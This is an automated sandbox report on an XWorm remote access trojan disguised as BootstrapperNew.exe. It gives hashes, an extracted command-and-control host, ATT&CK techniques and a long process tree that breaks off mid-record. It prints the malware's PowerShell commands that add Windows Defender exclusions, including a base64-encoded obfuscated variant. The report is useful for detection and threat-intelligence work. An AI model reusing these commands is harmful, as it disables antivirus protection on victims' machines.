xworm | 49709bb94a666f4430453283645a3bb138e576304af0e00682b3301a26b8cac2

Analysis

max time kernel
1s
max time network
14s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
25-01-2025 17:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootstrapperNew.exe
Size

3.0MB
MD5

d689c61a3e256005c7b08f6f26f1d337
SHA1

954247af9649cb70872e92da3dcf98d8efb45364
SHA256

49709bb94a666f4430453283645a3bb138e576304af0e00682b3301a26b8cac2
SHA512

bc627ebc0a0b418e1e4e20237d5b45f02d8617559fe49b160f7fc3432b2f501c5bee095c7ac2bc8785a97e20c80feb53e23d234ce5af1a598ae3e1060d440ac6
SSDEEP

49152:SpUqO2fRme5Iqki3W8ZPQYzwEC0slQ1nNbYl2FrQGGByf20EGNk:Spvf5pkeW8ZPQgwF0sAN0l2FrQGG+E

Score

10^/10

xworm defense_evasion discovery execution rat trojan

Malware Config

Extracted

Family

xworm

look-omega.gl.at.ply.gg:27099

Attributes

Install_directory
%AppData%
install_file
SecurityHealthSystray.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0009000000029ed0-4.dat	family_xworm
behavioral1/memory/2008-12-0x0000000000C70000-0x0000000000C94000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2560	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
2008	SecurityHealthSystray.exe
2932	SecurityHealthSystray.exe
3276	SecurityHealthSystray.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2008	SecurityHealthSystray.exe
Token: SeDebugPrivilege	2932	SecurityHealthSystray.exe
Token: SeDebugPrivilege	3276	SecurityHealthSystray.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3096 wrote to memory of 3512	3096	BootstrapperNew.exe	77
PID 3096 wrote to memory of 3512	3096	BootstrapperNew.exe	77
PID 3096 wrote to memory of 3512	3096	BootstrapperNew.exe	77
PID 3096 wrote to memory of 2008	3096	BootstrapperNew.exe	79
PID 3096 wrote to memory of 2008	3096	BootstrapperNew.exe	79
PID 3096 wrote to memory of 2868	3096	BootstrapperNew.exe	80
PID 3096 wrote to memory of 2868	3096	BootstrapperNew.exe	80
PID 3096 wrote to memory of 2868	3096	BootstrapperNew.exe	80
PID 2868 wrote to memory of 3844	2868	BootstrapperNew.exe	81
PID 2868 wrote to memory of 3844	2868	BootstrapperNew.exe	81
PID 2868 wrote to memory of 3844	2868	BootstrapperNew.exe	81
PID 2868 wrote to memory of 2932	2868	BootstrapperNew.exe	83
PID 2868 wrote to memory of 2932	2868	BootstrapperNew.exe	83
PID 2868 wrote to memory of 3936	2868	BootstrapperNew.exe	84
PID 2868 wrote to memory of 3936	2868	BootstrapperNew.exe	84
PID 2868 wrote to memory of 3936	2868	BootstrapperNew.exe	84
PID 3936 wrote to memory of 3384	3936	BootstrapperNew.exe	85
PID 3936 wrote to memory of 3384	3936	BootstrapperNew.exe	85
PID 3936 wrote to memory of 3384	3936	BootstrapperNew.exe	85
PID 3936 wrote to memory of 3276	3936	BootstrapperNew.exe	120
PID 3936 wrote to memory of 3276	3936	BootstrapperNew.exe	120
PID 3936 wrote to memory of 1628	3936	BootstrapperNew.exe	88
PID 3936 wrote to memory of 1628	3936	BootstrapperNew.exe	88
PID 3936 wrote to memory of 1628	3936	BootstrapperNew.exe	88

C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3096
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3512
- C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
  "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2560
- C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3844
- - C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
    "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2932
- - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3936
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      PID:3384
  - - C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
      "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3276
  - - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1628
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        5⤵
        
        PID:1260
    - - C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        5⤵
        
        PID:2748
    - - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        5⤵
        
        PID:2596
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        6⤵
        
        PID:2028
      - C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        6⤵
        
        PID:2132
      - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        6⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        7⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        7⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        7⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        8⤵
        
        PID:4272
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        8⤵
        
        PID:852
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        8⤵
        
        PID:1272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        9⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        9⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        9⤵
        
        PID:4400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        10⤵
        
        PID:2568
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        10⤵
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        10⤵
        
        PID:3340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        11⤵
        
        PID:3940
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        11⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        11⤵
        
        PID:4916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        12⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        12⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        12⤵
        
        PID:4684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        13⤵
        
        PID:1476
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        13⤵
        
        PID:2756
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        13⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        14⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        14⤵
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        14⤵
        
        PID:1028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        15⤵
        
        PID:1204
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        15⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        15⤵
        
        PID:1364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        16⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        16⤵
        
        PID:5248
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        16⤵
        
        PID:5256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        17⤵
        
        PID:5464
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        17⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        17⤵
        
        PID:5508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        18⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        18⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        18⤵
        
        PID:5820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        19⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        19⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        19⤵
        
        PID:6092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        20⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        20⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        20⤵
        
        PID:5300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        21⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        21⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        21⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        22⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        22⤵
        
        PID:6076
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        22⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        23⤵
